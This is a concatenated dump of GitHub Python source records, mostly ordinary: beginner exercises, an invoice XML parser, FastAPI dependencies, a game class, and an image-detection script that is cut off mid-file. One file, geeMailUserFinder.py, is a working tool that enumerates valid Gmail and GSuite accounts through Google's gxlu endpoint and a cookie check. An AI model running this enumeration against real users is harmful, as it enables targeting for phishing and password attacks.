)\n","repo_name":"quiltdata/local","sub_path":"quilt3_local/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2752,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"53"} +{"seq_id":"20074607893","text":"import urllib.request\n\nurl=\"http://weather.noaa.gov/pub/data/observations/metar/decoded/EGLL.TXT\"\nweatherData = urllib.request.urlopen(url).read().decode('utf-8')\n\n# Waeather data\nfor line in weatherData.split('\\n'):\n print(line)\n\n# Challenge\n# ======================================================================\n# Find the current weather in london\n\n\n\n\n\n\n# Useful functions\n# ======================================================================\ndemo = 'name: number'\ndemoList = demo.split(':')\nprint(demoList)","repo_name":"hpgmiskin/python-essentials","sub_path":"download_weather.py","file_name":"download_weather.py","file_ext":"py","file_size_in_byte":518,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"72030864488","text":"myString=\"hello\"\nmyFloat=10.0\nmyInt=20\n\nif myString == \"hello\":\n print(\"String: %s\" % myString)\nif isinstance(myFloat, float) and myFloat == 10.0:\n print(\"Float: %f\" % myFloat)\nif isinstance(myInt, int) and myInt == 20:\n print(\"Integer: %d\" % myInt)\n\nmyList = [1,2,3]\nmyList.append(myFloat)\n\nfor x in myList:\n print(x)\n\nname = \"Damien\"\nage = 38\n\nprint(\"Name %s, age %d\" % (name, age))\n\n# python -m unittest discover test/arrays/ -v\n","repo_name":"damien-neveu/algo-study","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":444,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"20925218114","text":"import pandas as pd\nimport bs4\nimport re\ndef xmll(ruta):\n with open(ruta) as page:\n soup = bs4.BeautifulSoup(page, 'xml')\n nameFile=re.findall(r\"(\\d{9,}.+)\\.\",ruta)[0]\n nameFile_ext=f\"{nameFile}.xml\"\n suplierOb=soup.find('cac:AccountingSupplierParty')\n rucSupplier=suplierOb.find('cbc:CustomerAssignedAccountID').text\n nameSupplier=suplierOb.find('cbc:Name').text.strip()\n totalPriceAmount=soup.find('cbc:PayableAmount').text\n netPriceAmount=soup.find('cbc:PriceAmount').text\n emissionDate=soup.find('cbc:IssueDate').text\n vouchNumber=re.findall(r\"_(\\d+).xml\",ruta)[0]\n lettersAmount=soup.find('cbc:Note').text\n lettersAmount=re.findall(r\"(.+)SOLES\",lettersAmount)[0].strip()\n serialNumber=soup.find('cac:OrderReference').find('cbc:ID').text\n serialNumber=re.findall(r\"(E\\d+)-\\d+\",serialNumber)[0].strip()\n rucClient=soup.find('cac:AccountingCustomerParty').find('cbc:CustomerAssignedAccountID').text\n nameClient=soup.find('cac:AccountingCustomerParty').find('cac:Party').find('cac:PartyName').find('cbc:Name').text.strip()\n typeDocument=re.findall(r\"_(\\d+)_\",ruta)[0]\n \n supplierInfoList=[]\n supplierInfo={\n 'nameFile':nameFile_ext,\n 'nameFilee':nameFile,\n 'RUC EMISOR':rucSupplier,\n 'NOMBRE EMISOR':nameSupplier,\n 'PRECIO TOTAL BRUTO':totalPriceAmount,\n 'PRECIO TOTAL NETO':netPriceAmount,\n 'FECHA DE EMISION':\"'\"+str(emissionDate),\n 'RUC RECEPTOR':rucClient,\n 'NOMBRE RECEPTOR':nameClient,\n 'PRECIO LETRAS':lettersAmount,\n 'NUMERO COMPROBATE':vouchNumber,\n 'SERIE':serialNumber,\n 'TIPO DOCUMENTO':typeDocument,\n }\n supplierInfoList.append(supplierInfo)\n return supplierInfo\n#df=pd.DataFrame(list(supplierInfoList))\n#print(df)\n#print(xmll(r\"xmlFolder\\10480238011_02_E001_20.xml\"))\n","repo_name":"danielichis/pdf_xmls_validators","sub_path":"parseXml.py","file_name":"parseXml.py","file_ext":"py","file_size_in_byte":1849,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"74189684646","text":"#!/usr/bin/python3\r\nimport re\r\nimport requests as request_handler\r\nimport argparse\r\nimport textwrap\r\nimport sys\r\nimport time\r\nfrom colorama import Fore, Style, init\r\n\r\ndef definitions():\r\n global info, close, success, fail\r\n info, fail, close, success = Fore.YELLOW + Style.BRIGHT, Fore.RED + \\\r\n Style.BRIGHT, Style.RESET_ALL, Fore.GREEN + Style.BRIGHT\r\n\r\ndef banner():\r\n print(Fore.YELLOW + Style.BRIGHT + \"\")\r\n print(' __ ___ _ __ __ __ _______ __ ') \r\n print(' ____ ____ ___ / |/ /___ _(_) / / / / /_______ _____ / ____(_)___ ____/ /__ _____')\r\n print(' / __ `/ _ \\/ _ \\/ /|_/ / __ `/ / / / / / / ___/ _ \\/ ___/ / /_ / / __ \\/ __ / _ \\/ ___/')\r\n print(' / /_/ / __/ __/ / / / /_/ / / / / /_/ (__ ) __/ / / __/ / / / / / /_/ / __/ / ')\r\n print(' \\__, /\\___/\\___/_/ /_/\\__,_/_/_/ \\____/____/\\___/_/ /_/ /_/_/ /_/\\__,_/\\___/_/ ')\r\n print('/____/ ')\r\n print(\" Version 1.0.0 \")\r\n print(\" A project by The Mayor \")\r\n print(\" geeMailUserFinder.py -h to get started \\n\" + Style.RESET_ALL)\r\n print(\"-\" * 90)\r\n\r\n\r\ndef options():\r\n opt_parser = argparse.ArgumentParser(formatter_class=argparse.RawDescriptionHelpFormatter, epilog=textwrap.dedent(\r\n '''\r\n---Validate a single email---\r\npython3 geeMailUserFinder.py -e test@test.com\\n\r\n---Validate a list of emails and write to file---\r\npython3 geeMailUserFinder.py -r testemails.txt -w valid.txt\\n\r\n---Validate a list of emails, write to file and timeout between requests---\r\npython3 geeMailUserFinder.py -r emails.txt -w validemails.txt -t 30\\n\r\n---Validate a list of emails and timeout between requests---\r\npython3 geeMailUserFinder.py -r emails.txt -t 30\\n\r\n---Validate a list of emails using verbose mode---\r\npython3 geeMailUserFinder.py -r emails.txt -v\\n\r\n'''))\r\n opt_parser.add_argument(\r\n '-e', '--email', help='Runs geeMailUserFinder against a single email')\r\n opt_parser.add_argument(\r\n '-r', '--read', help='Reads email addresses from file')\r\n opt_parser.add_argument(\r\n '-w', '--write', help='Writes valid emails to text file')\r\n opt_parser.add_argument(\r\n '-t', '--timeout', help='Set timeout between checks.')\r\n opt_parser.add_argument(\r\n '-v', '--verbose', help='Verbose mode', action='store_true')\r\n opt_parser.add_argument('-u', '--userlist', help='Reads usernames from file')\r\n opt_parser.add_argument('-d', '--domain', help='Uses manually entered domain.')\r\n opt_parser.add_argument('-c', '--checkdomain', help='Checks if domain is valid. Requires -d ', action='store_false')\r\n global args\r\n args = opt_parser.parse_args()\r\n if len(sys.argv) == 1:\r\n opt_parser.print_help()\r\n opt_parser.exit()\r\n\r\ndef handler():\r\n if args.read and args.userlist and args.email is not None or args.read and args.userlist is not None:\r\n print(fail + '\\n[-] Please select only one option and try again.') \r\n sys.exit()\r\n if args.email is not None:\r\n single_test()\r\n if args.read is not None:\r\n gmail_test()\r\n if args.userlist is not None:\r\n gmail_users()\r\n if args.checkdomain is not None and args.domain is None:\r\n print(fail + '\\n[-] Please enter a domain to check. -c -d ')\r\n sys.exit()\r\n if args.checkdomain is not None and args.domain is not None and args.email is None: \r\n domain_test()\r\n \r\n\r\n\r\n\r\ndef single_test():\r\n if args.email is not None:\r\n email = args.email\r\n url = \"https://mail.google.com/mail/gxlu?email=\" + email + \"&zx=e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\"\r\n request = request_handler.head(url)\r\n response = request.text\r\n cook_check = str(request.cookies.get_dict())\r\n valid_response = re.search(\"'COMPASS':\", cook_check)\r\n if args.verbose is not None:\r\n print(request.status_code, response)\r\n if valid_response:\r\n print(success + f'\\n[!] {email} - Valid Gmail account!')\r\n else:\r\n print(fail + f'\\n[-] {email} - Invalid Gmail account.')\r\n else:\r\n pass\r\n\r\ndef gmail_test():\r\n # counter = 0\r\n if args.read is not None: \r\n with open(args.read, 'r') as line_count:\r\n lines = len(line_count.readlines())\r\n print(info + f'\\n[!] Loading {lines} emails to test.\\n')\r\n with open(args.read, 'r') as f:\r\n counter = 0\r\n for line in f:\r\n email = line.split()\r\n email = ' '.join(email)\r\n url = \"https://mail.google.com/mail/gxlu?email=\" + email + \"&zx=e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\"\r\n request = request_handler.get(url)\r\n cook_check = str(request.cookies.get_dict())\r\n valid_response = re.search(\"'COMPASS':\", cook_check)\r\n if args.verbose:\r\n print('\\n',email, url, request, request.status_code)\r\n if valid_response:\r\n b = \" Result - Valid Email Found! [+]\"\r\n print(success + f'[+] {email:53} {b}' + Style.RESET_ALL)\r\n counter = counter + 1\r\n if args.write is not None:\r\n with open(args.write, 'a') as valid_emails:\r\n valid_emails.write(f\"{email}\\n\")\r\n else:\r\n b = \" Result - Invalid Email Found! [-]\"\r\n print(fail + f'[-] {email:53} {b}' + Style.RESET_ALL)\r\n if args.timeout is not None:\r\n time.sleep(int(args.timeout))\r\n if counter == 0:\r\n print(\r\n fail + '\\n[-] There were no valid logins found. [-]' + close)\r\n if counter == 1:\r\n print(\r\n info + '\\n[info] geeMail User Finder discovered one valid login account.' + close)\r\n if counter > 1:\r\n print(\r\n info + f'\\n[info] geeMail User Finder discovered {counter} valid login accounts.' + close)\r\n\r\n else:\r\n pass\r\n\r\ndef gmail_users():\r\n # counter = 0\r\n print(info + f'\\n [!] Checking if target domain uses GSuite.')\r\n domain_test()\r\n if args.userlist is not None: \r\n with open(args.userlist, 'r') as line_count:\r\n lines = len(line_count.readlines())\r\n print(info + f'\\n[!] Loading {lines} usernames to test.\\n')\r\n with open(args.userlist, 'r') as f:\r\n counter = 0\r\n for line in f:\r\n username = line.split()\r\n username = ' '.join(username)\r\n email = username + '@' + args.domain\r\n url = \"https://mail.google.com/mail/gxlu?email=\" + email + \"&zx=e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\"\r\n request = request_handler.get(url)\r\n cook_check = str(request.cookies.get_dict())\r\n valid_response = re.search(\"'COMPASS':\", cook_check)\r\n if args.verbose:\r\n print('\\n',email, url, request, request.status_code)\r\n if valid_response:\r\n b = \" Result - Valid Email Found! [+]\"\r\n print(success + f'[+] {email:53} {b}')\r\n counter = counter + 1\r\n if args.write is not None:\r\n with open(args.write, 'a') as valid_emails:\r\n valid_emails.write(f\"{email}\\n\")\r\n else:\r\n b = \" Result - Invalid Email Found! [-]\"\r\n print(fail + f'[-] {email:53} {b}')\r\n if args.timeout is not None:\r\n time.sleep(int(args.timeout))\r\n if counter == 0:\r\n print(\r\n fail + '\\n[-] There were no valid logins found. [-]' + close)\r\n if counter == 1:\r\n print(\r\n info + '\\n[info] geeMail User Finder discovered one valid login account.' + close)\r\n if counter > 1:\r\n print(\r\n info + f'\\n[info] geeMail User Finder discovered {counter} valid login accounts.' + close)\r\n\r\n else:\r\n pass\r\n\r\ndef domain_test():\r\n domain = args.domain\r\n url = f'https://www.google.com/a/{domain}/ServiceLogin?https://docs.google.com/a/{domain}'\r\n request = request_handler.get(url)\r\n re.search(\"Server error\", request.text)\r\n if args.verbose:\r\n print(request.text) \r\n if re.search(\"Server error\", request.text):\r\n print(fail + f'\\n[-] {domain} - Invalid GSuite domain!')\r\n else:\r\n print(success + f'\\n[+] {domain} - Valid GSuite domain!')\r\n\r\nif __name__ == '__main__':\r\n try:\r\n init()\r\n definitions()\r\n banner()\r\n options()\r\n print(Fore.YELLOW + Style.BRIGHT +\r\n f'\\n[info] Starting geeMail User Finder at {time.ctime()}' + Style.RESET_ALL) \r\n handler()\r\n # single_test()\r\n # gmail_test()\r\n # gmail_users()\r\n print(\r\n info + f'\\n[info] Scan completed at {time.ctime()}\\n' + close)\r\n except KeyboardInterrupt:\r\n print(fail + '\\n[-] User Interrupt. [-]' + close)\r\n print(\r\n info + f'\\n[info] Scan completed at {time.ctime()}\\n' + close)\r\n sys.exit()\r\n except FileNotFoundError:\r\n print(fail + '\\n[-] File not found. Check filename and try again [-]' + close)\r\n","repo_name":"dievus/geeMailUserFinder","sub_path":"geeMailUserFinder.py","file_name":"geeMailUserFinder.py","file_ext":"py","file_size_in_byte":9844,"program_lang":"python","lang":"en","doc_type":"code","stars":101,"dataset":"github-code","pt":"53"} +{"seq_id":"294362598","text":"\"\"\"FastAPI dependencies\"\"\"\nfrom typing import Generator\n\nfrom botocore.exceptions import ClientError\nfrom fastapi import Depends, HTTPException\nfrom fastapi.security.api_key import APIKeyHeader\nfrom sqlalchemy import create_engine\nfrom sqlalchemy.orm.session import Session\nfrom starlette.status import HTTP_403_FORBIDDEN\n\nfrom altimeter.core.log import Singleton\nfrom altimeter.qj.config import APIServiceConfig, DBConfig\nfrom altimeter.qj.crud.crud_job import CRUDJob\nfrom altimeter.qj.crud.crud_result_set import CRUDResultSet\nfrom altimeter.qj.notifier import ResultSetNotifier\nfrom altimeter.qj.security import get_api_key\nfrom altimeter.qj.settings import API_KEY_HEADER_NAME\n\n\n# pylint: disable=too-few-public-methods\nclass SessionGenerator(metaclass=Singleton):\n \"\"\"Singleton class for generating db sesssions\"\"\"\n\n def __init__(self) -> None:\n db_config = DBConfig()\n self._engine = create_engine(db_config.get_db_uri(), pool_pre_ping=True, pool_recycle=3600)\n\n def get_session(self) -> Session:\n \"\"\"Get a db session object\"\"\"\n return Session(autocommit=False, autoflush=False, bind=self._engine)\n\n\ndef db_session() -> Generator[Session, None, None]:\n \"\"\"Get a db session\"\"\"\n try:\n session = SessionGenerator().get_session()\n yield session\n finally:\n session.close()\n\n\ndef job_crud() -> CRUDJob:\n \"\"\"Get a CRUDJob object\"\"\"\n api_svc_config = APIServiceConfig()\n return CRUDJob(\n db_ro_user=api_svc_config.db_ro_user,\n result_expiration_sec_default=api_svc_config.result_expiration_sec_default,\n result_expiration_sec_limit=api_svc_config.result_expiration_sec_limit,\n max_graph_age_sec_default=api_svc_config.max_graph_age_sec_default,\n max_graph_age_sec_limit=api_svc_config.max_graph_age_sec_limit,\n max_result_age_sec_default=api_svc_config.max_result_age_sec_default,\n max_result_age_sec_limit=api_svc_config.max_result_age_sec_limit,\n account_id_key=api_svc_config.account_id_key,\n )\n\n\ndef result_set_crud() -> CRUDResultSet:\n \"\"\"Get a CRUDResultSet object\"\"\"\n api_svc_config = APIServiceConfig()\n return CRUDResultSet(\n max_result_set_results=api_svc_config.max_result_set_results,\n max_result_size_bytes=api_svc_config.max_result_size_bytes,\n job_crud=job_crud(),\n )\n\n\ndef result_set_notifier() -> ResultSetNotifier:\n \"\"\"Get a ResultSetNotifier object\"\"\"\n api_svc_config = APIServiceConfig()\n return ResultSetNotifier(\n sns_topic_arn=api_svc_config.result_set_notification_sns_topic_arn,\n region_name=api_svc_config.region,\n )\n\n\ndef api_key(key: str = Depends(APIKeyHeader(name=API_KEY_HEADER_NAME))) -> str:\n \"\"\"Validate an api key string matches the value currently in SecretsManager\"\"\"\n region = APIServiceConfig().region\n current_api_key_secret = get_api_key(region_name=region)\n if key == current_api_key_secret:\n return key\n try:\n pending_api_key_secret = get_api_key(version_stage=\"AWSPENDING\", region_name=region)\n if key == pending_api_key_secret:\n return key\n except ClientError as c_e:\n response_error = getattr(c_e, \"response\", {}).get(\"Error\", {})\n error_code = response_error.get(\"Code\", \"\")\n if error_code != \"ResourceNotFoundException\":\n raise c_e\n raise HTTPException(status_code=HTTP_403_FORBIDDEN, detail=\"Could not validate credentials\")\n","repo_name":"tableau/altimeter","sub_path":"altimeter/qj/api/deps.py","file_name":"deps.py","file_ext":"py","file_size_in_byte":3452,"program_lang":"python","lang":"en","doc_type":"code","stars":72,"dataset":"github-code","pt":"53"} +{"seq_id":"74557156646","text":"def midIndex(a):\n # fxn to find midpoint of array\n low = 0\n high = len(a)\n return int((high-low)/2)\na = [-5, 10, -1, 15, 25, 13, -10]\n\n\ndef maxX(a, low, mid, high):\n #finds the maximum subarray which crosses the midpoint (found in above function) inside an array\n mid = midIndex(a)\n sumL = -float('inf')\n leftind = 0\n tempL = 0\n for i in range(mid, -1, -1):\n tempL += a[i]\n if tempL > sumL:\n sumL = tempL\n leftind = i\n\n sumR = -float('inf')\n rightind = 0\n tempR = 0\n for j in range(mid+1, len(a)):\n tempR += a[j]\n if tempR > sumR:\n sumR = tempR\n rightind = j\n\n sum = sumR + sumL\n return leftind, rightind, sum\n\ndef recursion(a, low, high):\n #recursion over the left and right halves, and comparison as to the largest overall subarray\n if high - 1 == low:\n return low, high, a[low]\n else:\n midd = int((high - low)/2)\n left_low, left_high, left_sum = recursion(a, low, midd)\n right_low, right_high, right_sum = recursion(a, midd + 1, high)\n cross_low, cross_high, cross_sum = maxX(a, low, midd, high)\n if left_sum > right_sum and left_sum > cross_sum:\n return left_low, left_high, left_sum\n elif right_sum > left_sum and right_sum > cross_sum:\n return right_low, right_high, right_sum\n elif cross_sum > left_sum and cross_sum > right_sum:\n return cross_low, cross_high, cross_sum\n #RuntimeError: maximum recursion depth exceeded while calling a Python object\nrecursion(a, 0, len(a))\n","repo_name":"alexmcclanahan/maxSubArray","sub_path":"d&c.py","file_name":"d&c.py","file_ext":"py","file_size_in_byte":1602,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"7317796622","text":"from globals import MAX_HEIGHT, GRAVITY_FORCE, PIPE_WIDTH\nfrom pipe import PipeManager\n\n\nPLAYER_POS_X = 50\n\nclass Player:\n pos_x: int # FIXED VALUE\n pos_y: int\n\n def __init__(self):\n self.pos_x = PLAYER_POS_X\n self.pos_y = MAX_HEIGHT/2\n self.move = 0.0\n\n def apply_gravity(self):\n self.move += GRAVITY_FORCE\n self.pos_y += self.move\n \n def jump(self):\n self.move = -7.5\n\n def check_collisions(self):\n for pipe in PipeManager.pipes:\n if self.pos_x > pipe.pos_x and self.pos_x < pipe.pos_x + PIPE_WIDTH:\n # upper body\n if self.pos_y > pipe.hole_position + pipe.hole_height/2 or \\\n self.pos_y < pipe.hole_position - pipe.hole_height/2:\n return True\n","repo_name":"MichalPrzyl/flappyBirdPythonAI","sub_path":"player.py","file_name":"player.py","file_ext":"py","file_size_in_byte":795,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"72081572968","text":"print('Введите любое целое число больше 0')\r\nN = int(input('N='))\r\ncount = 1\r\ni = 0\r\n# for i in range(N):\r\n# print(N)\r\nwhile count <= N:\r\n print(count, end = ' ')\r\n count = count * 2\r\n i = i + 1\r\n \r\n","repo_name":"Kir7879/Python_Seminar2_1","sub_path":"seminar2_3.py","file_name":"seminar2_3.py","file_ext":"py","file_size_in_byte":243,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"16217301229","text":"from django.contrib.auth.decorators import login_required\nfrom django.contrib.auth.mixins import LoginRequiredMixin\nfrom django.http import JsonResponse\nfrom django.urls import reverse_lazy\nfrom django.utils.decorators import method_decorator\nfrom django.views.decorators.csrf import csrf_exempt\nfrom django.views.generic import *\nfrom .forms import *\nimport re\nfrom core.models import *\nfrom .extra import *\nfrom .bot_fechas import GeneradorCitas\nfrom ..mixins import IsSuperUserMixin\nfrom ..pruebas.extra import get_pruebas\n\n\nclass MostrarCalendarioView(TemplateView):\n model = Fecha\n template_name = 'fechas/calendar_prueba.html'\n context_object_name = 'fechas'\n extra = Extra()\n\n @method_decorator(login_required)\n @method_decorator(csrf_exempt)\n def dispatch(self, request, *args, **kwargs):\n return super().dispatch(request, *args, **kwargs)\n\n def post(self, request, *args, **kwargs):\n data = {}\n try:\n\n if request.POST['accion'] == 'filtrar_fechas':\n obj_filtro = {\n 'id_prueba': int(request.POST['select_prueba']),\n 'sedes': tuple(map(int, re.findall('[0-9]+', request.POST['sedes'])))\n }\n\n data = self.extra.get_fechas_filtradas(obj_filtro)\n\n if request.POST['accion'] == 'cargar_pruebas':\n data = get_pruebas()\n\n if request.POST['accion'] == 'cargar_sedes':\n data = [i.toJSON() for i in sede.objects.all()]\n\n if request.POST['accion'] == 'eliminar':\n fecha = Fecha.objects.get(pk=request.POST['id_evento']).delete()\n\n except Exception as e:\n data['error'] = str(e)\n print(data['error'])\n return JsonResponse(data, safe=False)\n\n def get_context_data(self, *, object_list=None, **kwargs):\n context = super().get_context_data(**kwargs)\n context['page_title'] = 'Listado Fechas'\n context['page_info'] = 'Fechas Disponibles'\n context['agregar_title'] = \"Agregar una Nueva Fecha\"\n return context\n\n\nclass CreateFechaListView(LoginRequiredMixin, TemplateView):\n model = Fecha\n template_name = 'fechas/create_fecha.html'\n context_object_name = 'fechas'\n form_class = FechaForm, PruebaForm\n generador_citas = GeneradorCitas\n success_url = reverse_lazy('FechaTemplateView')\n\n @method_decorator(login_required)\n @method_decorator(csrf_exempt)\n def dispatch(self, request, *args, **kwargs):\n return super().dispatch(request, *args, **kwargs)\n\n def post(self, request, *args, **kwargs):\n data = {}\n\n try:\n\n if request.POST['accion'] == 'agregar':\n self.generador_citas(request.POST).guardar_citas()\n data['redirect'] = True\n data['redirect_url'] = self.success_url\n\n if request.POST['accion'] == 'cargar_pruebas':\n data = get_pruebas()\n\n if request.POST['accion'] == 'cargar_sedes':\n data = [i.toJSON() for i in sede.objects.all()]\n\n except Exception as e:\n data['error'] = str(e)\n print(data['error'])\n return JsonResponse(data, safe=False)\n\n def get_context_data(self, *, object_list=None, **kwargs):\n context = super().get_context_data(**kwargs)\n context['page_title'] = 'Listado Fechas'\n context['page_info'] = 'Fechas Disponibles'\n context['agregar_title'] = \"Agregar una Nueva Fecha\"\n context['form'] = FechaForm()\n return context\n","repo_name":"francoag2310/app","sub_path":"core/fechas/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3565,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"15334682570","text":"#-*- coding:utf-8 -*-\n# list=[1,2,6,91,0,\"a\",61,39]\n# for i in list:\n# print(\"------\",i)\n# try:\n# print(2/i)\n# except Exception as e:\n# print(\"出错误的地方为:\",e)\n# else:\n# print(\"正常执行,没有错误\")\n# finally:\n# print(\"结束\")\npwd=\"23124683548\"\nif len(pwd)<8:\n ex=Exception(\"密码不能低于八位\")\n raise ex\nelse:\n print(\"zc\")\n\n\n\n","repo_name":"LMlmptm/python","sub_path":"我要自学网/python初学者4.py","file_name":"python初学者4.py","file_ext":"py","file_size_in_byte":415,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"34903547623","text":"\"\"\"Tools for writing actuators\"\"\"\n\nfrom click import argument, option\n\n\n\"\"\"A path to a push map file\"\"\"\npush_map_arg = argument('push-map', envvar='PUSHER_PUSH_MAP', type=str)\n\n\n\"\"\"A destination branch for pushing patches\"\"\"\ntarget_branch_arg = argument(\n 'target-branch', envvar='REPO_PUSH_BRANCH', type=str\n)\n\n\"\"\"A git refspec to check out\"\"\"\nrefspec_arg = argument('refspec', envvar='REPO_REF', type=str)\n\n\n\"\"\"A git repository to clone\"\"\"\nrepo_url_arg = argument('repo-url', envvar='REPO_URL', type=str)\n\n\n\"\"\"A flag to add 'automerge' in commit header\"\"\"\nautomerge_opt = option('--automerge', envvar='AUTOMERGE', is_flag=True)\n\n","repo_name":"oVirt/jenkins","sub_path":"stdci_libs/actuators/common.py","file_name":"common.py","file_ext":"py","file_size_in_byte":634,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"53"} +{"seq_id":"17685538198","text":"import numpy as np\nimport cv2\n\nfrom ClassifiyImages_with_MobileNet import Classify\n\nclass Videoextractor:\n def __init__(self):\n #self.classifier = Classify(\"../../Inception_10000_6600Images/output_labels.txt\", \"../../Inception_10000_6600Images/output_graph.pb\", 'DecodeJpeg/contents:0', 'final_result:0')\n #self.classifier = Classify(\"../../Inception_5000_3Classes/output_labels.txt\", \"../../Inception_5000_3Classes/output_graph.pb\", 'DecodeJpeg/contents:0', 'final_result:0')\n self.classifier = Classify(\"D:/tf\\output_labels.txt\", \"D:/tf\\output_graph.pb\", 'input:0', 'final_result:0')\n\n def createVideo(self):\n cap = cv2.VideoCapture('D:\\Download\\hot_vids\\output5.mpg')\n\n font = cv2.FONT_HERSHEY_SIMPLEX\n bottomLeftCornerOfText = (20,400)\n fontScale = 1\n fontColor = (255,255,255)\n lineType = 2\n\n while(cap.isOpened()):\n ret, frame = cap.read()\n\n cv2.imwrite('bild.jpg',frame)\n #classification_text = self.direction_to_number(self.classifier.classifyAImage('bild.jpg'))\n classification_text = str(self.classifier.classify_image('bild.jpg'))\n cv2.putText(frame, 'Position: ' + classification_text, bottomLeftCornerOfText, font, fontScale, fontColor, lineType)\n cv2.imshow('frame', frame)\n\n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\n\n cap.release()\n cv2.destroyAllWindows()\n\ndef main():\n extractor = Videoextractor()\n extractor.createVideo()\n\nif __name__ == \"__main__\":\n main()","repo_name":"markusgl/drone-control-system","sub_path":"NotUsed/videoextraction_with_MobileNet.py","file_name":"videoextraction_with_MobileNet.py","file_ext":"py","file_size_in_byte":1570,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"11073415869","text":"\nimport keras\nfrom keras_retinanet import models\nfrom keras_retinanet.utils.image import read_image_bgr, preprocess_image, resize_image\nfrom keras_retinanet.utils.visualization import draw_box, draw_caption\nfrom keras_retinanet.utils.colors import label_color\nimport cv2\nimport os\nimport numpy as np\nimport time\nimport tensorflow as tf\nimport math\nfrom matplotlib import pyplot as plt\nimport csv\nfrom PIL import ExifTags\n\ndef get_session():\n config = tf.compat.v1.ConfigProto()\n config.gpu_options.allow_growth = True\n return tf.compat.v1.Session(config=config)\n\n### Detection on images\n\nmin_score = 0.6\nmodel_path = '/home/golah/whiteboard_project/machine_learning/converted_neural_models/converted_model_train_9_100.h5' ## replace this with your model path\nmodel = models.load_model(model_path, backbone_name='resnet50')\nlabels_to_names = {0:'whiteboard'} ## replace with your model labels and its index val\n\n#input_path = '/home/golah/whiteboard_project/projects/miki/images/01_test_images_low_res_old_board/original_images/'\n#output_path = '/home/golah/whiteboard_project/projects/miki/images/01_test_images_low_res_old_board/box_images/'\n#crop_output = '/home/golah/whiteboard_project/projects/miki/images/01_test_images_low_res_old_board/cropped_images/' ## output containing crop results\n\n#input_path = '/home/golah/whiteboard_project/projects/miki/images/02_test_images_high_res_old_board/original_images/'\n#input_path = '/home/golah/whiteboard_project/projects/miki/images/02_test_images_high_res_old_board/res_images/'\n#output_path = '/home/golah/whiteboard_project/projects/miki/images/02_test_images_high_res_old_board/box_images/'\n#crop_output = '/home/golah/whiteboard_project/projects/miki/images/02_test_images_high_res_old_board/cropped_images/' ## output containing crop results\n\n#input_path = '/home/golah/whiteboard_project/projects/miki/images/03_test_images_low_res_new_board/original_images/'\n#output_path = '/home/golah/whiteboard_project/projects/miki/images/03_test_images_low_res_new_board/box_images/'\n#crop_output = '/home/golah/whiteboard_project/projects/miki/images/03_test_images_low_res_new_board/cropped_images/' ## output containing crop results\n\ninput_path = '/home/golah/whiteboard_project/projects/miki/images/04_test_images_high_res_new_board/original_images/'\noutput_path = '/home/golah/whiteboard_project/projects/miki/images/04_test_images_high_res_new_board/box_images/'\ncrop_output = '/home/golah/whiteboard_project/projects/miki/images/04_test_images_high_res_new_board/cropped_images/' ## output containing crop results\n\n\nunique_identifier = 'box_'\nnew_boxes = []\nbox_coords_path = '/home/golah/whiteboard_project/projects/miki/results/box_coords.csv' ## your path to the csv file containing coordinates\noutlier_images_path = '/home/golah/whiteboard_project/projects/miki/results/outlier_names.csv' ## your path to the csv file containing coordinates\ncut_coords_path = '/home/golah/whiteboard_project/projects/miki/results/cut_coords.csv' ## your path to the csv file containing coordinates\nheight_to_width_ratio = 0.70\nimage_names = []\noutlier_images = []\ncoords = []\nsave_results = True\ndef detection_on_image(image_path,output_full_path):\n \n image = cv2.imread(image_path)\n draw = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)\n image = preprocess_image(image)\n h, w = image.shape[:2]\n image, scale = resize_image(image)\n boxes, scores, labels = model.predict_on_batch(np.expand_dims(image, axis=0))\n max_score = scores.max()\n boxes /= scale\n if np.all(scores[0] < min_score):\n print(file, \": NO BOX\")\n outlier_images.append(file)\n new_boxes.append(np.array([0,0,0,0]))\n else: \n for box, score, label in zip(boxes[0], scores[0], labels[0]):\n if score < max_score:\n break\n\n if score < min_score:\n break\n \n print(\"Confidence_score:\", score)\n print(\"Label:\", labels_to_names[label])\n # Draw box\n color = label_color(label)\n b = box.astype(int)\n draw_box(draw, b, color=color)\n caption = \"{} {:.3f}\".format(labels_to_names[label], score)\n draw_caption(draw, b, caption)\n new_boxes.append(b.copy())\n detected_img = cv2.cvtColor(draw, cv2.COLOR_RGB2BGR)\n if save_results == True:\n cv2.imwrite(output_full_path, detected_img)\n #cv2.imshow('Detection',detected_img)\n #cv2.waitKey(0)\n\n### RUN DETECTION ON ALL IMAGES IN THE INPUT FOLDER\n\nfor file in os.listdir(input_path):\n input_full_path = os.path.join(input_path,file)\n output_full_path = os.path.join(output_path,(unique_identifier+file))\n detection_on_image(input_full_path,output_full_path)\n print(file + \" DONE\")\n\nif save_results == True:\n print(\"Box detection results saved to:\" +output_path)\nnp.savetxt(box_coords_path, new_boxes, delimiter=',') ### SAVE COORDS TO CSV\nprint(\"Box coordinates saved to:\", box_coords_path)\nwith open(outlier_images_path, 'w') as f_0:\n for i in outlier_images:\n f_0.write(\"%s\\n\"% i)\nprint(\"List of images without detected box saved to:\", outlier_images_path)\n\n\n### CUT OUT THE TABLES ACCORDING TO THE BOX COORDINATES\n\n#for file in 